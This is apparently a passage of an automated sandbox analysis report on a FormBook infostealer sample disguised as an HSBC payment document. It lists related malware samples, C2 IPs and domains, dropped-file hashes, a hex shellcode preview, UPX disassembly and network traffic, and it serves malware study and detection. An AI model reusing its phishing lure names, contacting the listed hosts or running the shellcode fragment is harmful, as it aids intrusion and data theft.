                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                  • 172.67.200.242
                  Salary List.exeGet hashmaliciousFormBookBrowse
                  • 104.21.21.230
                  www.zl1l5r.websiteAdjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 198.16.50.172
                  PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                  • 198.16.50.172
                  z28098882729202928.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 176.113.70.180
                  900524362267263.exeGet hashmaliciousFormBookBrowse
                  • 176.113.70.180
                  dokaz o uplati.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 176.113.70.180
                  QUOTATION #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                  • 176.113.70.180
                  COTA#U00c7#U00c3O #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                  • 176.113.70.180
                  ftrrrttyt.exeGet hashmaliciousFormBookBrowse
                  • 176.113.70.180
                  RFQ2024563429876-9887877654.exeGet hashmaliciousFormBookBrowse
                  • 176.113.70.180
                  www.oliviacorepilates.comShipping Documents.pdf.exeGet hashmaliciousFormBookBrowse
                  • 3.33.244.179
                  W5TnMyRi78vdxpf.exeGet hashmaliciousFormBookBrowse
                  • 3.33.244.179
                  www.hawalaz.xyzAdjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  U prilogu lista novih narudzbi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  z28098882729202928.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  900524362267263.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.72
                  dokaz o uplati.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  yetung.com.lho0.faipod.comShipping Documents.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  IMG______6122024.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  PO14624.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  IMG___001.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  IMG__001.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  lrShdpqqbi.rtfGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  pFvpxWS2lD.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  rShippingDocuments.exeGet hashmaliciousFormBookBrowse
                  • 121.37.199.72
                  kloeti.pc205kopl.comFiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                  • 162.209.189.210
                  KALIANDRA SETYATAMA_24000000120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                  • 162.209.189.212
                  Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                  • 162.209.189.210
                  2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exeGet hashmaliciousFormBookBrowse
                  • 162.209.189.211

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  FTG-AS-APForewinTelecomGroupLimitedISPatHKwQsdlAeKOF.elfGet hashmaliciousMiraiBrowse
                  • 115.126.52.144
                  AAwUREvt6b.elfGet hashmaliciousMiraiBrowse
                  • 118.99.50.248
                  8kCtyMSFxf.exeGet hashmaliciousDinodas RATBrowse
                  • 115.126.98.204
                  8kCtyMSFxf.exeGet hashmaliciousDinodas RATBrowse
                  • 115.126.98.204
                  VIMEKSIM PO# 1330 Confirmation_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 115.126.37.251
                  VESSEL PARTICULARS & INSTRUCTIONS_docx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 115.126.37.251
                  Purchase_Order_PA056223.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 115.126.37.251
                  skyljnee.arm7-20240128-0910.elfGet hashmaliciousMiraiBrowse
                  • 115.126.52.124
                  3Xq2C4NXet.exeGet hashmaliciousFormBookBrowse
                  • 118.99.48.216
                  President_Mohamed_Irfaan_Ali's_Official_Visit_to_Nassau,_The_Bahamas.exeGet hashmaliciousUnknownBrowse
                  • 115.126.98.204
                  CNSERVERSUSAdjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 198.16.50.172
                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                  • 162.209.189.210
                  SJ5SyRpCFA.elfGet hashmaliciousUnknownBrowse
                  • 154.88.57.118
                  PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                  • 198.16.50.172
                  arm4-20240623-0650.elfGet hashmaliciousMiraiBrowse
                  • 156.251.245.85
                  ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                  • 156.251.142.108
                  HSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                  • 154.198.243.132
                  acLghFWq0Z.elfGet hashmaliciousMiraiBrowse
                  • 172.247.146.162
                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                  • 45.205.12.21
                  BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                  • 156.251.142.105
                  ACPCAAdjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.72
                  yUFX4wGvLW.elfGet hashmaliciousMirai, MoobotBrowse
                  • 162.54.102.167
                  DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.72
                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.72
                  Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.72
                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.72
                  doc_Rfq_TNTM Spareparts TM00002916620 exp_pdf.com.exeGet hashmaliciousDarkCloudBrowse
                  • 162.55.60.2
                  RFQ-ref_05921538.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                  • 162.0.209.224
                  ACENS_ASSpainHostinghousingandVPNservicesESRequest for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                  • 217.116.0.191
                  D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                  • 217.116.0.191
                  REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                  • 217.116.0.191
                  pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                  • 217.116.0.191
                  RFQ for Maintenance usering for Sabratha Project.exeGet hashmaliciousFormBookBrowse
                  • 217.116.0.191
                  CFV20240600121.exeGet hashmaliciousFormBookBrowse
                  • 217.116.0.191
                  file.exeGet hashmaliciousSystemBCBrowse
                  • 217.116.0.152
                  8427xbk3Zt.elfGet hashmaliciousUnknownBrowse
                  • 81.46.192.224
                  vm6XYZzWOd.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                  • 82.194.66.60
                  bzVCvtoyIt.elfGet hashmaliciousMiraiBrowse
                  • 81.46.244.157

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\-9698mK2

                  Download File
                  Process:C:\Windows\SysWOW64\rundll32.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                  Category:dropped
                  Size (bytes):196608
                  Entropy (8bit):1.1209935793793442
                  Encrypted:false
                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                  MD5:214CFA91B0A6939C4606C4F99C9183B3
                  SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                  SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                  SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\autDF3B.tmp

                  Download File
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):272896
                  Entropy (8bit):7.995975841426055
                  Encrypted:true
                  SSDEEP:6144:BKJkjgzfkLcTQiRnhXO2jdRtGgZiee18ZXwcNY9Ma8ykDj+nKW:f2JTQEhz3QgZijGlCz8thW
                  MD5:C88EF6AE25EA906A594E0F0EFB9FBAA2
                  SHA1:DB7B26CB48D5267B6821308124CA5F7E2A245613
                  SHA-256:FE1F7BEED9B270ACBD19EBD3E289654FD237F1240B97AD9A823ECD80A0164BA6
                  SHA-512:C3BE303037B08B3FC8434B8C4B15C6B1701EE5610F4ED479D7818B07D52192B8B2994159E7FD5FB50C7B8378248D305494660A07C6EF7509FE795332C9F0B20D
                  Malicious:false
                  Reputation:low
                  Preview:.....1JTD...\......YD....UQ...NJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1.TDQ@-.F5.1.m.F..{f>00w6<%V85)q-S;&Z&.R)y5-]z[8y...n'^.1j\C8qH5R80LY>Y:..6>.j&)..*3.K.rU5.*..dS=.L..z.-..='9sR2.5R80LYGXc.2V.BVFA..TDQN2UH5.82MRFS3Z*RYCWFNJ1JT.EN2UX5R8.HYGXsZ2FYCWDNJ7JTDQN2UN5R80LYGX.^2V[CWFNJ1HT..N2EH5B80LYWX3J2VYCWF^J1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYm##6>1JT FJ2UX5R8(HYGH3Z2VYCWFNJ1JTDqN25H5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYC

                  C:\Users\user\AppData\Local\Temp\autDF7A.tmp

                  Download File
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9890
                  Entropy (8bit):7.604261411389946
                  Encrypted:false
                  SSDEEP:192:65jwEiqilnLM9ny1R9hi4Vd/zJkecGgDTv3qKXX1ho/ngGXNdbspHDuLBN3mT/aX:I6qilnw9nydhi8eecGkL3H1ho/nJdWsD
                  MD5:4ACEB3AF2985F59217FB7EF286528BBC
                  SHA1:9658BB756D9DFDBF51BD15DE992B54719E5369ED
                  SHA-256:0AE845556273C6ABD7C7C3A86DAB0E560F0EAF265B9B7EAFEA207B88FB37C02F
                  SHA-512:C030E6116B00B54A3276D296D604F96FE1D2CF470B1DD9E16B783F0568CE191110B62C8587C171F7029037E55CF00CB8F312A48C0960B06BE9351069FDBFA05B
                  Malicious:false
                  Reputation:low
                  Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                  C:\Users\user\AppData\Local\Temp\indivisibility

                  Download File
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):272896
                  Entropy (8bit):7.995975841426055
                  Encrypted:true
                  SSDEEP:6144:BKJkjgzfkLcTQiRnhXO2jdRtGgZiee18ZXwcNY9Ma8ykDj+nKW:f2JTQEhz3QgZijGlCz8thW
                  MD5:C88EF6AE25EA906A594E0F0EFB9FBAA2
                  SHA1:DB7B26CB48D5267B6821308124CA5F7E2A245613
                  SHA-256:FE1F7BEED9B270ACBD19EBD3E289654FD237F1240B97AD9A823ECD80A0164BA6
                  SHA-512:C3BE303037B08B3FC8434B8C4B15C6B1701EE5610F4ED479D7818B07D52192B8B2994159E7FD5FB50C7B8378248D305494660A07C6EF7509FE795332C9F0B20D
                  Malicious:false
                  Reputation:low
                  Preview:.....1JTD...\......YD....UQ...NJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1.TDQ@-.F5.1.m.F..{f>00w6<%V85)q-S;&Z&.R)y5-]z[8y...n'^.1j\C8qH5R80LY>Y:..6>.j&)..*3.K.rU5.*..dS=.L..z.-..='9sR2.5R80LYGXc.2V.BVFA..TDQN2UH5.82MRFS3Z*RYCWFNJ1JT.EN2UX5R8.HYGXsZ2FYCWDNJ7JTDQN2UN5R80LYGX.^2V[CWFNJ1HT..N2EH5B80LYWX3J2VYCWF^J1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYm##6>1JT FJ2UX5R8(HYGH3Z2VYCWFNJ1JTDqN25H5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYC

                  C:\Users\user\AppData\Local\Temp\murky

                  Download File
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:ASCII text, with very long lines (28756), with no line terminators
                  Category:dropped
                  Size (bytes):28756
                  Entropy (8bit):3.6001852112347517
                  Encrypted:false
                  SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbJ+I66H54vfF3if6gyyw:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rk
                  MD5:AF525DCDECDDAB659F9F580008AAF210
                  SHA1:738AD250A54DF646375C523EB6DAFC073E71CCE4
                  SHA-256:92186CD08BE51BD01191AA73E324850C982A5D8337C54DE98947160D5790E79B
                  SHA-512:E29E9044AA0DEDC5447070F802573B396028598EEFAE2CC485F1E66D4C75C777F9B1E8E7F66105EAA4B3AAB42C5ECCACEDA87592582E9B918665A7CFB09B586F
                  Malicious:false
                  Reputation:low
                  Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                  Entropy (8bit):7.923765157713181
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.39%
                  • UPX compressed Win32 Executable (30571/9) 0.30%
                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  File name:HSBCscancopy-invoice778483-payment87476MT103.exe
                  File size:719'872 bytes
                  MD5:15125bd7f04e0129ceebb7781f7051d2
                  SHA1:d06ac0fc49a473fafac1069ebe195edd6996cec1
                  SHA256:e5f5e88e8becfe092d10a927f72f580fd3a98612989a69a1f6df309f32b169f6
                  SHA512:4f7ae5be7fe522742170a38f4f805b38013d908ad71ba5d4e48976036f389d89f80af5e88e652195bc4ed46142ff036ff3f4ab012d06c4185c218d76c1bd1d1d
                  SSDEEP:12288:mYV6MorX7qzuC3QHO9FQVHPF51jgcmB+3sSfAW5p5c+EV6XpIzmb:lBXu9HGaVHm8SWHe+E8Emb
                  TLSH:0BE412526E03ED7EC4BF42F9543EB550B503ED28C95B1A5E32DBB94687B82A4E033790
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                  File Icon

                  Icon Hash:25243e2cb65666b4

                  Static PE Info

                  General

                  Entrypoint:0x5320a0
                  Entrypoint Section:UPX1
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6684CEC0 [Wed Jul 3 04:08:32 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:fc6683d30d9f25244a50fd5357825e79

                  Entrypoint Preview

                  Instruction
                  pushad
                  mov esi, 004DC000h
                  lea edi, dword ptr [esi-000DB000h]
                  push edi
                  jmp 00007F48E8F763CDh
                  nop
                  mov al, byte ptr [esi]
                  inc esi
                  mov byte ptr [edi], al
                  inc edi
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F763AFh
                  mov eax, 00000001h
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  add ebx, ebx
                  jnc 00007F48E8F763CDh
                  jne 00007F48E8F763EAh
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F763E1h
                  dec eax
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  jmp 00007F48E8F76396h
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  jmp 00007F48E8F76414h
                  xor ecx, ecx
                  sub eax, 03h
                  jc 00007F48E8F763D3h
                  shl eax, 08h
                  mov al, byte ptr [esi]
                  inc esi
                  xor eax, FFFFFFFFh
                  je 00007F48E8F76437h
                  sar eax, 1
                  mov ebp, eax
                  jmp 00007F48E8F763CDh
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F7638Eh
                  inc ecx
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F76380h
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  add ebx, ebx
                  jnc 00007F48E8F763B1h
                  jne 00007F48E8F763CBh
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jnc 00007F48E8F763A6h
                  add ecx, 02h
                  cmp ebp, FFFFFB00h
                  adc ecx, 02h
                  lea edx, dword ptr [edi+ebp]
                  cmp ebp, FFFFFFFCh
                  jbe 00007F48E8F763D0h
                  mov al, byte ptr [edx]

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x18bec00x424.rsrc
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1330000x58ec0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x18c2e40xc.rsrc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1322840x48UPX1
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  UPX00x10000xdb0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  UPX10xdc0000x570000x56400e8ba3979b7993255a63d3ac995698db4False0.9873896059782609data7.935381232832145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x1330000x5a0000x594001dacf871281cf3c3636eab06e3d21f05False0.9034242603291317data7.858307054458179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x13345c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0x1335880x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0x1336b40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0x1337e00xa2a8Device independent bitmap graphic, 100 x 200 x 32, image size 40000, resolution 5905 x 5905 px/mEnglishGreat Britain0.19913544668587896
                  RT_MENU0xd2a780x50emptyEnglishGreat Britain0
                  RT_STRING0xd2ac80x594emptyEnglishGreat Britain0
                  RT_STRING0xd305c0x68aemptyEnglishGreat Britain0
                  RT_STRING0xd36e80x490emptyEnglishGreat Britain0
                  RT_STRING0xd3b780x5fcemptyEnglishGreat Britain0
                  RT_STRING0xd41740x65cemptyEnglishGreat Britain0
                  RT_STRING0xd47d00x466emptyEnglishGreat Britain0
                  RT_STRING0xd4c380x158emptyEnglishGreat Britain0
                  RT_RCDATA0x13da8c0x4df00data1.0003320469125903
                  RT_GROUP_ICON0x18b9900x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x18b9a80x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x18b9c00x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x18b9d80x14dataEnglishGreat Britain1.25
                  RT_VERSION0x18b9f00xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x18bad00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                  Imports

                  DLLImport
                  KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                  ADVAPI32.dllGetAce
                  COMCTL32.dllImageList_Remove
                  COMDLG32.dllGetOpenFileNameW
                  GDI32.dllLineTo
                  IPHLPAPI.DLLIcmpSendEcho
                  MPR.dllWNetUseConnectionW
                  ole32.dllCoGetObject
                  OLEAUT32.dllVariantInit
                  PSAPI.DLLGetProcessMemoryInfo
                  SHELL32.dllDragFinish
                  USER32.dllGetDC
                  USERENV.dllLoadUserProfileW
                  UxTheme.dllIsThemeActive
                  VERSION.dllVerQueryValueW
                  WININET.dllFtpOpenFileW
                  WINMM.dlltimeGetTime
                  WSOCK32.dllconnect

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 3, 2024 10:50:51.093254089 CEST4971880192.168.2.11118.99.50.8
                  Jul 3, 2024 10:50:51.098886013 CEST8049718118.99.50.8192.168.2.11
                  Jul 3, 2024 10:50:51.098963976 CEST4971880192.168.2.11118.99.50.8
                  Jul 3, 2024 10:50:51.101381063 CEST4971880192.168.2.11118.99.50.8
                  Jul 3, 2024 10:50:51.106642962 CEST8049718118.99.50.8192.168.2.11
                  Jul 3, 2024 10:50:51.965064049 CEST8049718118.99.50.8192.168.2.11
                  Jul 3, 2024 10:50:51.965188980 CEST8049718118.99.50.8192.168.2.11
                  Jul 3, 2024 10:50:51.965399981 CEST4971880192.168.2.11118.99.50.8
                  Jul 3, 2024 10:50:51.968379021 CEST4971880192.168.2.11118.99.50.8
                  Jul 3, 2024 10:50:51.976737022 CEST8049718118.99.50.8192.168.2.11
                  Jul 3, 2024 10:51:15.236264944 CEST4972080192.168.2.11162.0.213.72
                  Jul 3, 2024 10:51:15.241398096 CEST8049720162.0.213.72192.168.2.11
                  Jul 3, 2024 10:51:15.241584063 CEST4972080192.168.2.11162.0.213.72
